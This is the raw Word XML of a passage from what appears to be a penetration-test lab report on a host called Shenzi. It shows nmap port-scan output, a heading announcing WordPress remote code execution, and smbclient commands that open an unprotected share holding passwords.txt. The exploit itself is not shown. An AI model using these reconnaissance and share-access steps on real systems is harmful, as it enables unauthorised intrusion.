                <w:p w14:paraId="1C8B2485"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135/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">   </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">open  </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>msrpc</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w14:paraId="2104D3EA"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139/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">   </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">open  </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>netbios</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>-ssn</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="51428A6E"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443/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">   </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>open  https</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w14:paraId="00C57050"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445/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">   </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">open  </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>microsoft</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>-ds</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="31725214"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3306/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  open</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>mysql</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="09C398C5"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49665/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>open  unknown</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w14:paraId="2FC871D5"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8"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Nmap done: 1 IP address (1 host up) scanned in 173.20 </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>seconds</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w14:paraId="37C3B350"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lastRenderedPageBreak/>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="022D2A84" wp14:editId="19C4B903">
                        <wp:extent cx="5613400" cy="2131695"/>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5613400" cy="2131695"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="69C2C55C"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nmap</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>sCV</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 192.168.232.55</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2E7939D6" w14:textId="01A213CB" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:b/>
                      <w:noProof/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AFA5E44" wp14:editId="61FF2DB1">
                        <wp:extent cx="5397500" cy="3543300"/>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
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5397500" cy="3543300"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="423F4BAD" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00E20BC9">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="6AC95898" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00E20BC9">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="686495A4" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00E20BC9">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="6C4774BC" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRPr="00E20BC9" w:rsidRDefault="00E20BC9">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="7BAC9BB5" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t xml:space="preserve">4.1.2 </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Initial Access – SMB share to </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Wordpress</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> RCE</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="27DE6E35" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">SMB </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>revlead</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> a ‘</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Shenzi</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>’ share which was not protected with password and has interesting files for us.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1B36C00C"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smbclient</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -L \\\\192.168.232.55</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1E724934"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1588DB16" wp14:editId="3E49912A">
                        <wp:extent cx="5397500" cy="1231900"/>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
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5397500" cy="1231900"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="216F1640"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smbclient</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> \\\\192.168.232.55\\</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shenzi</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="3DB55E3B"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Password for [WORKGROUP\kali]:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="71ECD41F"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Try "help" to get a list of possible commands.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2592AF89"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proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>smb</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>: \&gt; ls</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0764E16E"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  .                                   D        </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>0  Thu</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> May 28 19:45:09 2020</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4428F774"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  ..                                  D        </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>0  Thu</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> May 28 19:45:09 2020</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="72A9E358"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  passwords.txt                A     </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>894  Thu</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> May 28 19:45:09 2020</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7A83AEBC"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  readme_en.txt               A   </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>7367  Thu</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> May 28 19:45:09 2020</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="28D36799"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  sess_klk75u2q4rpgfjs3785h6hpipp      A     </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>3879  Thu</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> May 28 19:45:09 2020</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="513A1174"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  </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>why.tmp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">                        A      </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>213  Thu</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> May 28 19:45:09 2020</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3BBC63CF"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  xampp-control.ini           A      </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>178  Thu</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> May 28 19:45:09 2020</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="454DDFC7" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">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p>
                <w:p w14:paraId="578EBE7E"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 12941823 blocks of size 4096. 5850488 blocks available</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1A2EC284" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="0EE8F429" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:noProof/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2752DE9D" wp14:editId="3132E528">
                        <wp:extent cx="5613400" cy="1831975"/>
                        <wp:effectExtent l="0" t="0" r="0" b="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5613400" cy="1831975"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
